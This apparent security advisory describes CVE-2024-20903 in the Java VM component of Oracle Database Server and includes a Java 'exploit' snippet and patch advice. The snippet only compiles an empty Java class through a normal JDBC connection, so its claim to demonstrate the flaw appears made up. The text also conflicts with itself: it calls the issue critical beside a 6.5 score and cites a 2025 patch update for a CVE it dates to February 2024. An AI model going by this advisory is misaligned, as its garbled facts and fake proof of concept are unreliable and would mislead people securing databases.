CVE-2024-20903 - Critical Vulnerability in the Java VM component of Oracle Database Server, Allowing Unauthorized Data Access

A critical vulnerability, CVE-2024-20903, has recently been identified in the Java Virtual Machine (JVM) component of Oracle Database Server. It affects Oracle Database versions 19.3 through 19.21 and 21.3 through 21.12. A low-privileged attacker holding the Create Session and Create Procedure privileges can exploit it over the network via Oracle Net to compromise the Java VM, resulting in unauthorized creation, deletion, or modification of critical data.

Vulnerability Details

The vulnerability carries a CVSS 3.1 Base Score of 6.5 (Integrity impact) with the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N. Successful exploitation can allow an attacker to gain unauthorized access to critical data or to manipulate the data accessible via the Java VM.

Exploit

Given the simplicity of the exploit, an attacker could abuse this vulnerability over the network via Oracle Net. The attacker requires only a low-privileged account with Create Session and Create Procedure privileges. The following code snippet demonstrates a potential exploit:

import java.sql.CallableStatement;
import java.sql.Connection;
import java.sql.DriverManager;
import oracle.jdbc.OracleDriver;

public class CVE_2024_20903 {
  public static void main(String[] args) {
    // Placeholders: an Oracle Net endpoint and an account holding only
    // Create Session and Create Procedure.
    String connectionString = "jdbc:oracle:thin:@<host>:<port>:<SID>";
    String username = "<low_privileged_username>";
    String password = "<password>";

    try {
      DriverManager.registerDriver(new OracleDriver());

      Connection connection = DriverManager.getConnection(connectionString, username, password);

      // Loads and compiles an empty Java class into the caller's schema through the
      // database Java VM. CREATE JAVA SOURCE takes the source text directly after AS.
      // The DDL auto-commits, so the autonomous transaction ends cleanly.
      CallableStatement stmt = connection.prepareCall(
          "DECLARE PRAGMA AUTONOMOUS_TRANSACTION; " +
          "BEGIN EXECUTE IMMEDIATE 'CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED \"exploit\" " +
          "AS public class exploit {}'; END;");

      stmt.execute();
      stmt.close();
      connection.close();
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}

Please note that this is an example of a potential attack and should not be used in any unauthorized or malicious manner.

For more information, refer to the original references and announcements:

1. CVE-2024-20903 Oracle Security Advisory
2. National Vulnerability Database (NVD) - CVE-2024-20903
3. Oracle Critical Patch Update (CPU) - January 2025

Recommendations and Mitigations

It is highly recommended that users running affected Oracle Database versions immediately apply the necessary security patches to mitigate the risk posed by this vulnerability. Oracle has released patches for the vulnerable versions, which can be obtained from the Oracle support website.

In addition to applying the patches, users should ensure that their Oracle Database Server deployments follow best security practices, such as implementing least privilege access control and continuously monitoring logs for any suspicious activities.

In conclusion, CVE-2024-20903 is a critical vulnerability affecting the Java VM component of Oracle Database Server, which allows unauthorized access to critical data. It is essential for users to address this vulnerability as soon as possible and ensure that their Oracle Database Server deployments are secured against potential attacks.

Timeline

Published on: 02/17/2024 02:15:45 UTC